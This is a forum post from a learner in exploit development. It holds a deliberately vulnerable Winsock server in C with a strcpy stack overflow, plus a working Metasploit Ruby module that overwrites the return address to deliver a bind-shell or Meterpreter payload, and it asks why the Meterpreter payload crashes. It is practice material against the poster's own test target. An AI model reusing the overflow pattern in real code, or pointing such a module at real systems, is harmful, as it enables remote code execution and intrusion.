
Metasploit: Problems with Meterpreter payload [pschoenb]

I am in the process of learning the art of penetration testing and also how to work with Metasploit, including the development of new exploits. As a first test for exploit development, I wrote a little Windows server:
```c
/* server.cpp */
/*
 * Minimal single-threaded Winsock 1.1 TCP server: accepts one client at a
 * time on PORT, reads a single recv() chunk, prints it to the console with a
 * timestamp and closes the connection. It is a deliberately small
 * exploit-development target; the overflow it contains is described at
 * outputString() below.
 */
#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
#include <time.h>
/* Header files for Windows */
#include <winsock.h>
#include <io.h>
/* Port number */
#define PORT 1234
/* Buffers for incoming messages.
 * recv() in echo() fills up to RCVBUFSIZE - 1 bytes, but outputString()
 * copies the result into an INBUFSIZE-byte stack buffer with strcpy():
 * RCVBUFSIZE > INBUFSIZE is the window that makes the overflow possible. */
#define RCVBUFSIZE 8192
#define INBUFSIZE 2000
static void echo(SOCKET);
static void error_exit(char *errorMessage);
static void outputString(char* buffer, time_t zeit);
/* Output of the client information: read one chunk from client_socket and
 * print it together with the current time.
 * NOTE(review): only recv_size < 0 is treated as an error; a return of 0
 * (peer closed without sending) falls through and prints whatever
 * echo_buffer happens to hold, since the buffer is never initialised.
 * NOTE(review): the NUL-terminator write is commented out below, so
 * echo_buffer is handed to outputString() with no guarantee of termination
 * and recv_size is otherwise unused; strcpy() there may then read beyond
 * the bytes actually received. */
static void echo(SOCKET client_socket)
{
    char echo_buffer[RCVBUFSIZE];
    int recv_size;
    time_t zeit;
    if((recv_size = recv(client_socket, echo_buffer, RCVBUFSIZE - 1,0)) < 0)
        error_exit("Fehler bei recv()");
    // echo_buffer[recv_size] = '\0';
    time(&zeit);
    outputString(echo_buffer, zeit);
}
/* Copy buffer into a fixed INBUFSIZE (2000-byte) stack buffer and print it
 * with the timestamp zeit.
 * This is the overflow the server exists to demonstrate: the source comes
 * from recv() with up to RCVBUFSIZE - 1 (8191) bytes and no guaranteed NUL,
 * while strcpy() copies until it finds one. A bounded copy (memcpy of the
 * received length, or snprintf into in_buffer) would close it. */
static void outputString(char* buffer, time_t zeit)
{
    char in_buffer[INBUFSIZE];
    strcpy(in_buffer, buffer);
    printf("Nachrichten vom Client : %s \t%s", in_buffer, ctime(&zeit));
}
/* Error output: print error_message with the last Winsock error code on
 * stderr and terminate the process with EXIT_FAILURE. */
static void error_exit(char *error_message)
{
    fprintf(stderr,"%s: %d\n", error_message, WSAGetLastError());
    exit(EXIT_FAILURE);
}
/* Entry point: initialise Winsock 1.1, bind PORT on every local address and
 * serve clients one at a time forever (the accept loop never exits, so the
 * final return is unreachable; argc/argv are unused).
 * NOTE(review): SOCKET is an unsigned type on Winsock, so the `sock < 0` and
 * `fd < 0` checks below can never be true; compare against INVALID_SOCKET
 * to detect socket()/accept() failure. */
int main( int argc, char *argv[])
{
    struct sockaddr_in server, client;
    SOCKET sock, fd;
    int len;
#ifdef _WIN32
    WORD wVersionRequested;
    WSADATA wsaData;
    wVersionRequested = MAKEWORD (1, 1);
    if (WSAStartup (wVersionRequested, &wsaData) != 0)
        error_exit( "Fehler beim Initialisieren von Winsock");
    else
        printf("Winsock initialisiert\n");
#endif
    /* Create the socket. */
    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock < 0)
        error_exit("Fehler beim Anlegen eines Sockets");
    /* Build the server's socket address. */
    memset( &server, 0, sizeof (server));
    /* IPv4 connection */
    server.sin_family = AF_INET;
    /* INADDR_ANY: accept on every local IP address */
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    /* Port number */
    server.sin_port = htons(PORT);
    /* Bind to a specific port. */
    if(bind(sock,(struct sockaddr*)&server, sizeof( server)) < 0)
        error_exit("Socket bind error\"binden\"");
    /* Accept connections (backlog of 5) */
    if(listen(sock, 5) == -1 )
        error_exit("Fehler bei listen");
    /* Print everything that arrives */
    while(1) {
        len = sizeof(client);
        fd = accept(sock, (struct sockaddr*)&client, &len);
        /* Printed once per accepted connection, not at startup, because it
         * comes after the blocking accept(). */
        printf("Server ready\n");
        if (fd < 0)
            error_exit("Fehler bei accept");
        printf("Bearbeite den Client mit der Adresse: %s\n", inet_ntoa(client.sin_addr));
        /* Screen output */
        echo( fd );
        /* Close the connection. */
        closesocket(fd);
    }
    return EXIT_SUCCESS;
}
```
My corresponding exploit looks like this: ```ruby require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp #The names of the exploit module and the class are 'equal' def initialize(info = {}) super(update_info(info, 'Name' => 'Buffer Overflow in test server', 'Description' => %q{ This module exploits a buffer overflow found in a special test server used to explore exploit writing. 
}, #End of Description 'Author' => 'Patrick Schoenbach', #Change this value with your (nick)name 'License' => MSF_LICENSE, 'Version' => '$Revision: 1 $', 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Payload' => { 'Space' => 2000, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Targets' => [ # Target 0 [ 'Windows 7', { 'Platform' => 'win', #We exploit a Windows target 'Ret' => 0x0018D4DC } ], ], 'DefaultTarget' => 0 ) #End of update_info() ) #End of super() register_options( [ Opt::RPORT(1234) ], self.class) end #End of initialize def exploit connect print_status("Trying target #{target.name}...") nullSize = 4 request = payload.encoded request << make_nops(nullSize) # overwrite EBP request << [target.ret].pack('V') request << "\x00" * nullSize print_status("Total string length: #{request.length}") sock.puts(request) handler disconnect #We disconnect from the server end #End of exploit end #End of class ``` When using a simple payload like "windows/shell_bind_tcp", the exploit works as expected. However, when using the payload "windows/meterpreter/bind_tcp", I get an access violation in the server, and I have no idea what actually goes wrong. Could someone please enlighten me as to what the problem could be? Sorry for posting so much code, but without the code, the problem would not be reproducible.

Posted by Edward Sheehy 6 days ago